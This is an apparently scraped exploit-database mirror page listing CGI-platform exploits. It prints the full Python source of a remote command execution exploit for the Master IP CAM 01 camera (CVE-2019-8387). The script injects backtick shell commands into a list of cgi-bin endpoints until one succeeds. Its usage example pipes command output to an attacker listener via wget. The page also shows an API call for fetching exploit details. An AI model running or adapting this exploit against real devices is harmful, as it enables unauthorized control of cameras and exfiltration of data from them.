Menu

Improved exploit search engine. Try it out

"Master IP CAM 01 3.3.4.2103 - Remote Command Execution"

Author

"Raffaele Sabato"

Platform

cgi

Release date

2019-02-18

Release Date Title Type Platform Author
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-01-24 "SirsiDynix e-Library 3.5.x - Cross-Site Scripting" webapps cgi AkkuS
2019-01-14 "AudioCode 400HD - Command Injection" webapps cgi Sysdream
2019-01-18 "Webmin 1.900 - Remote Command Execution (Metasploit)" remote cgi AkkuS
2019-01-07 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting" webapps cgi "Kumar Saurav"
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-08-15 "ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection" webapps cgi "Kyle Lovett"
2018-08-03 "cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal" webapps cgi "Google Security Research"
2018-03-30 "Homematic CCU2 2.29.23 - Remote Command Execution" webapps cgi "Patrick Muench and Gregor Kopf"
2018-03-30 "Homematic CCU2 2.29.23 - Arbitrary File Write" webapps cgi "Patrick Muench and Gregor Kopf"
2017-12-15 "ITGuard-Manager 0.0.0.1 - Remote Code Execution" webapps cgi "Nassim Asrir"
2017-12-13 "Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read" webapps cgi "Jakub Palaczynski"
2017-11-28 "Synology StorageManager 5.2 - Root Remote Command Execution" webapps cgi SecuriTeam
2017-10-15 "Webmin 1.850 - Multiple Vulnerabilities" webapps cgi hyp3rlinx
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-07-19 "Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection" webapps cgi xort
2017-07-19 "Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection" webapps cgi xort
2017-06-06 "Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure" webapps cgi "X41 D-Sec GmbH"
2017-04-07 "QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection" webapps cgi "Harry Sintonen"
2018-01-08 "Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration" webapps cgi "Steve Kaun"
2017-03-10 "dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting" webapps cgi "Shorebreak Security"
2017-01-27 "Radisys MRF - Command Injection" webapps cgi "Filippos Mastrogiannis"
2016-12-07 "NETGEAR R7000 - Command Injection" webapps cgi Acew0rm
2016-10-18 "Cgiemail 1.6 - Source Code Disclosure" webapps cgi "Finbar Crago"
2016-10-11 "AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities" webapps cgi "Gergely Eberhardt"
Release Date Title Type Platform Author
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2018-05-10 "Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery" webapps hardware "Raffaele Sabato"
2018-01-26 "Dodocool DC38 N300 - Cross-site Request Forgery" webapps hardware "Raffaele Sabato"
2018-01-17 "Master IP CAM 01 - Multiple Vulnerabilities" remote hardware "Raffaele Sabato"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46400/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46400/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46400/40870/master-ip-cam-01-3342103-remote-command-execution/download/", "exploit_id": "46400", "exploit_description": "\"Master IP CAM 01 3.3.4.2103 - Remote Command Execution\"", "exploit_date": "2019-02-18", "exploit_author": "\"Raffaele Sabato\"", "exploit_type": "webapps", "exploit_platform": "cgi", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387

import sys
import requests


if len(sys.argv) < 3:
	print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>"
  	print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'"
  	exit(1)

host = sys.argv[1]
command = sys.argv[2]
page = [
		"bconf.cgi",
		"ddns_start.cgi",
		"getddnsattr.cgi",
		"getinetattr.cgi",
		"getnettype.cgi",
		"getupnp.cgi",
		"getwifiattr.cgi",
		"getwifistatus.cgi",
		"inetconfig.cgi",
		"iptest.cgi",
		"listwifiap.cgi",
		"p2p.cgi",
		"paraconf.cgi",
		"scanwifi.cgi",
		"setadslattr.cgi",
		"setddnsattr.cgi",
		"setinetattr.cgi",
		"setwifiattr.cgi",
		"upnp_start.cgi",
		"wifimode.cgi",
		"wifitest.cgi",
		]
for x in page:
	url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
	#url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
	print "[*] Attack on "+x
	print "[+] Sending the payload"
	r = requests.get(url)
	if r.status_code == 200:
		print "[+] Exploit Success"
		break